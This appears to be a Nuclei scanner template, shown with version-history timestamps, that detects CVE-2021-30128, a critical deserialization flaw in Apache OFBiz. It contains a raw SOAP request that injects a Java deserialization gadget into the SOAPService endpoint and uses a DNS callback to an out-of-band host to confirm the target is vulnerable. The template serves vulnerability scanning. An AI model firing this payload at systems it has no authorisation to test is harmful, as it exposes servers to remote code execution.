2022-11-05 15:08:43 +00:00
id : CVE-2021-30128
info :
name : Apache OFBiz <17.12.07 - Arbitrary Code Execution
author : For3stCo1d
severity : critical
2023-03-21 20:22:02 +00:00
description : Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
2022-11-05 15:08:43 +00:00
reference :
- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
2023-01-05 11:21:19 +00:00
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
2023-03-21 20:22:02 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30128
2022-12-23 09:10:25 +00:00
classification :
2023-01-05 11:21:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-12-23 09:10:25 +00:00
cve-id : CVE-2021-30128
2023-01-05 11:21:19 +00:00
cwe-id : CWE-502
2022-11-05 15:08:43 +00:00
metadata :
fofa-query : app="Apache_OFBiz"
2023-01-05 11:21:19 +00:00
verified : "true"
2022-11-05 15:08:43 +00:00
tags : cve,cve2021,apache,ofbiz,deserialization,rce
requests :
- raw :
- |
POST /webtools/control/SOAPService HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
2022-12-16 12:55:42 +00:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
2022-11-05 15:08:43 +00:00
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
2022-12-16 12:55:42 +00:00
</map-Key>
<map-Value>
2022-11-05 15:08:43 +00:00
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition : and
matchers :
- type : word
2022-12-23 09:10:25 +00:00
part : interactsh_protocol
2022-11-05 15:08:43 +00:00
words :
- "dns"
- type : word
part : body
words :
2022-12-23 09:10:25 +00:00
- 'value="errorMessage"'
2023-03-21 20:22:02 +00:00
# Enhanced by md on 2023/03/21